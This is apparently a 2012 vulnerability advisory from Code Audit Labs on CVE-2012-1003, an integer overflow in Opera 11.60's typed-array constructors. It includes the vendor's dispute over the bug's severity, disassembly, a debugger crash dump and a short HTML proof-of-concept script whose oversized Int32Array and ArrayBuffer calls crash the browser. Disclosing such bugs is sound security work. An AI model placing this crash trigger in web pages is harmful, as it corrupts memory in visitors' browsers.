[CAL-2012-0004] opera array integer overflow

On 2012年02月2日, in 安全公告, by code_audit_labs

CAL-2012-0004 opera array integer overflow

CVE ID: CVE-2012-1003

1 Affected Products

=================
11.60 and prior

2 Vulnerability Details

=====================

Code Audit Labs http://www.vulnhunt.com has discovered a integer overflow
vulnerability in array functions like Int32Array,Int16Array… .

Opear vendor say “We have reproduced the problem, and determined that it
does not have any security implications, since the crash is a caused by a
memory fill operation which the webpage have no control over, and this
operation will always crash. It is therefore classified as a stability
issue, not a security issue. ”

we still insist on that it is a security issue or not should accord to root
cause of this bug instead of is it exploitable or not. because you think it is
unexploitable, someone can exploit it via deeply research.

So if most people of Security Community think this is a security issue,
please assign to a CVE number.

3 Analysis

=========
Int16Array(2147483647) example
memory corrupt happen if satisfy with following Conditions
1: x*2 >2
2:x*2!=00
3: (x*2-1)+0×1f overflow 32bits.

so the length of malloc is (x*2-1)+0×1f
memset(eax+0×10,0,x*2) cause memory corrupt

text:5C769F57
.text:5C769F57 loc_5C769F57:                           ; CODE XREF: sub_5C769DCE+17Cj
.text:5C769F57                 mov     eax, [esp+48h+var_20] ; var_20 is 2
.text:5C769F5B                 imul    eax, [esp+48h+var_3C] ; var_3C is 80000001
.text:5C769F60                 cmp     eax, [esp+48h+var_3C]
.text:5C769F64                 jb      short loc_5C769F37
.text:5C769F66                 mov     [esp+48h+size], eax
.text:5C769F6A                 mov     eax, [ebp+arg_0]
.text:5C769F6D                 call    sub_5C14A6E8
.text:5C769F72                 push    [esp+48h+size]  ; size
.text:5C769F76                 push    dword ptr [eax] ; int
.text:5C769F78                 push    [ebp+arg_0]     ; int
.text:5C769F7B                 call    sub_5C765B6D
.text:5C769F80                 add     esp, 0Ch

...

.text:5C46A598
.text:5C46A598 arg_0           = dword ptr  4
.text:5C46A598 size            = dword ptr  8
.text:5C46A598
.text:5C46A598                 mov     edx, [esp+arg_0]
.text:5C46A59C                 push    esi
.text:5C46A59D                 mov     esi, [esp+4+size]
.text:5C46A5A1                 test    esi, esi
.text:5C46A5A3                 jz      short loc_5C46A5AA
.text:5C46A5A5                 lea     eax, [esi-1]
.text:5C46A5A8                 jmp     short loc_5C46A5AC
.text:5C46A5AA ; ---------------------------------------------------------------------------
.text:5C46A5AA
.text:5C46A5AA loc_5C46A5AA:                           ; CODE XREF: sub_5C46A598+Bj
.text:5C46A5AA                 xor     eax, eax
.text:5C46A5AC
.text:5C46A5AC loc_5C46A5AC:                           ; CODE XREF: sub_5C46A598+10j
.text:5C46A5AC                 mov     ecx, [edx+8]
.text:5C46A5AF                 add     eax, 1Fh
.text:5C46A5B2                 push    0
.text:5C46A5B4                 and     eax, 0FFFFFFF8h
.text:5C46A5B7                 push    eax
.text:5C46A5B8                 push    edx
.text:5C46A5B9                 call    sub_5C019DA0

ext:5C765BF7 loc_5C765BF7:                           ; CODE XREF: sub_5C765B6D+50j
.text:5C765BF7                 push    [ebp+size]      ; size
.text:5C765BFA                 lea     eax, [ebx+10h]
.text:5C765BFD                 push    0               ; c
.text:5C765BFF                 push    eax             ; dst
.text:5C765C00                 call    memset

4 Exploitable?

============
who known?

5 Crash info:

===============

(d10.ff4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8 edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0         nv up ei pl nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010207
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Opera\Opera.dll -
Opera!OpGetNextUninstallFile+0x1961c:
675b347e 660f7f4150      movdqa  xmmword ptr [ecx+50h],xmm0 ds:0023:03680000=????????????????????????????????
0:000> .exr -1
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 03680000
Attempt to write to address 03680000
0:000> kp
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
02314e24 00000000 Opera!OpGetNextUninstallFile+0x1961c

6 POC:

====
open a html with following content

<script type="text/javascript">
//这些全是crash
Int32Array(1073741823)
Float32Array(1073741823)
Float64Array(1073741823)
Int32Array(1073741823)
Uint32Array(1073741823)
Int16Array(2147483647)
ArrayBuffer(4294967295)
</script>

7 About Code Audit Labs:

=====================
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:” You create value for customer,We protect your value”

http://www.VulnHunt.com

 

Comments are closed.